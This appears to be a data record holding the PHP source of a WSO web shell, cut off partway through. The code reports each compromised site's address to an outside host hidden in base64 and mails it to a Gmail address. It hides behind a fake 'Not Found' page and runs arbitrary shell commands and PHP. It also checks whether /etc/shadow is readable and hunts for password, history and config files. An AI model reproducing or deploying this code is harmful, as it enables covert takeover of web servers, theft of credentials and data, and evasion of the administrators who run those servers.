3	12	0	0.006065	1144192	eval	1	'?><?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n    $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n    if($gitt == false){\r\n        @$gitt = file_get_contents($x);\r\n    }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n    @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo \'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n .logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. \'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' &copy;\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case 